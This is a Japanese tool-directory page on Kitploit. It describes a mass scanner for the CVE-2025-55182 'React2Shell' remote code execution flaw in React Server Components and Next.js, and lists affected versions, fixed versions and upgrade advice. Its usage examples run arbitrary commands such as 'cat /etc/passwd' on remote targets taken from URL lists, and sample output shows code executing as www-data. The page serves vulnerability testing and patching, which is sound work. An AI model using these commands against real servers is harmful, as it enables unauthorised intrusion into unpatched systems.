Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/qixinlee/cve-2025-55182-scanner
偵察脆弱性スキャナーエクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubqixinlee/cve-2025-55182-scanner

CVE-2025-55182-Scanner

CVE-2025-55182 用自動スキャナー: React Server Components および Next.js における重大な RCE 脆弱性

リポジトリを見る
18ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
CVE-2025-55182-Scanner — CVE-2025-55182 用自動スキャナー: React Server Components および Next.js における重大な RCE 脆弱性 | Kitploit

CVE-2025-55182 RCE Scanner

CVE-2025-55182 (React2Shell) リモートコード実行脆弱性の一括検出・検証ツール。

⚠️ CVSS 10.0 重大脆弱性 | React Server Components および Next.js 15.x/16.x に影響 | 許可されたセキュリティテストのみに使用

脆弱性の概要

CVE-2025-55182(別名 "React2Shell")は CVSS 10.0 満点の重大レベルの 認証不要のリモートコード実行 (RCE) 脆弱性です。

この脆弱性は、React Server Components (RSC) の react-server パッケージにおける、RSC "Flight" プロトコル処理時の安全でないデシリアライズに起因します。攻撃者は特別に細工された HTTP リクエストを送信することで、脆弱なサーバ上で任意のコードを実行できます。

Next.js は RSC "Flight" プロトコルを使用しているため、create-next-app で作成されたデフォルト構成のアプリケーションでも、開発者が追加のコードを書くことなく悪用される可能性があります。2025 年 12 月 5 日以降、本脆弱性の活発な悪用が確認されています。

影響を受けるバージョン

React Server Components の影響を受けるバージョン:

パッケージ名影響を受けるバージョン
react-server-dom-webpack19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-turbopack19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-parcel19.0.0, 19.1.0, 19.1.1, 19.2.0

Next.js の影響を受けるバージョン(App Router 使用時):

影響を受ける可能性があるその他の RSC フレームワーク/ツール:

  • react-router
  • waku
  • @parcel/rsc
  • @vitejs/plugin-rsc
  • rwsdk
  • RedwoodJS(RSC モード)

一時的な緩和策

⚠️ 重要: この脆弱性には既知の一時的な緩和策はありません。安全なバージョンへのアップグレードが唯一の修正方法です。

推奨アップグレードバージョン:

  • React: 19.0.1、19.1.2、または 19.2.1 へアップグレード
  • Next.js: 16.0.7、15.5.7、15.4.8、または 15.3.6 へアップグレード

公式提供の fix-react2shell-next npm パッケージを使用して、影響を受ける Next.js アプリケーションの更新を支援できます。

依存関係のインストール

root@kitploit:~
pip install requests

使用方法

基本的な使い方

root@kitploit:~
# 一括スキャン(urls.txt からターゲットを読み込む)
python CVE-2025-55182.py -f urls.txt

# 単一ターゲットテスト
python CVE-2025-55182.py -u http://192.168.1.100:3000

カスタムコマンド

root@kitploit:~
# whoami コマンドの実行
python CVE-2025-55182.py -f urls.txt -c "whoami"

# hostname コマンドの実行
python CVE-2025-55182.py -u http://target.com -c "hostname"

# ファイルの読み取り
python CVE-2025-55182.py -f urls.txt -c "cat /etc/passwd"

詳細オプション

root@kitploit:~
# スレッド数とタイムアウトの指定
python CVE-2025-55182.py -f urls.txt -t 50 --timeout 15

# カスタム出力ファイル
python CVE-2025-55182.py -f urls.txt -o scan_results.csv

# サイレントモード(脆弱性のあるURLのみ出力)
python CVE-2025-55182.py -f urls.txt -q

パラメータ説明

URLファイル形式

1行に1つのURL。例:

root@kitploit:~
http://192.168.1.10:3000
http://192.168.1.11:3000

出力例

root@kitploit:~
    +---------------------------------------------------------------+
    |   ###   ## #######  ##  ## ########       ## #######          |
    |   ####  ## ##       ## ##     ##          ## ##               |
    |   ## ## ## #####     ###      ##          ## #######          |
    |   ##  #### ##       ## ##     ##      ##  ##       ##         |
    |   ##   ### ####### ##   ##    ##       ####  #######          |
    |                                                               |
    |   CVE-2025-55182 RCE Scanner                                  |
    +---------------------------------------------------------------+

============================================================
  [ CONFIGURATION ]
============================================================
  > Targets: 10
  > Threads: 20
  > Command: id

============================================================
  [ SCANNING ]
============================================================
  [14:30:25] [VULN] http://192.168.1.10:3000
             '--> uid=1000(www-data)
  [14:30:26] [SAFE] http://192.168.1.11:3000

+==========================================================+
|                     SCAN COMPLETE                        |
+==========================================================+
|  Total Targets :    10                                   |
|  Vulnerable    :     1                                   |
|  Safe          :     9                                   |
|  Errors        :     0                                   |
+==========================================================+

出力ファイル

スキャン結果は CSV 形式で保存され、以下のフィールドを含みます:

  • url - ターゲット URL
  • status - HTTP ステータスコード
  • vulnerable - 脆弱性の有無
  • output - コマンド実行出力
  • error - エラーメッセージ

免責事項

本ツールは許可されたセキュリティテストにのみ使用してください。不正利用は禁止されています。使用者は関連する責任を負うものとします。

ツールをダウンロード
メジャーバージョン影響を受けるバージョン範囲修正バージョン
16.0.x≤ 16.0.616.0.7
15.5.x≤ 15.5.615.5.7
15.4.x≤ 15.4.715.4.8
15.3.x≤ 15.3.515.3.6
15.2.x≤ 15.2.5-
15.1.x≤ 15.1.8-
15.0.x≤ 15.0.4-
14.x Canary≥ 14.3.0-canary.77-
パラメータ説明デフォルト値
-f, --fileURL リストファイルurls.txt
-u, --url単一ターゲットURL-
-t, --threads同時スレッド数20
--timeoutリクエストタイムアウト(秒)10
-o, --output出力 CSV ファイルresults.csv
-c, --command実行するコマンドid
-q, --quietサイレントモードfalse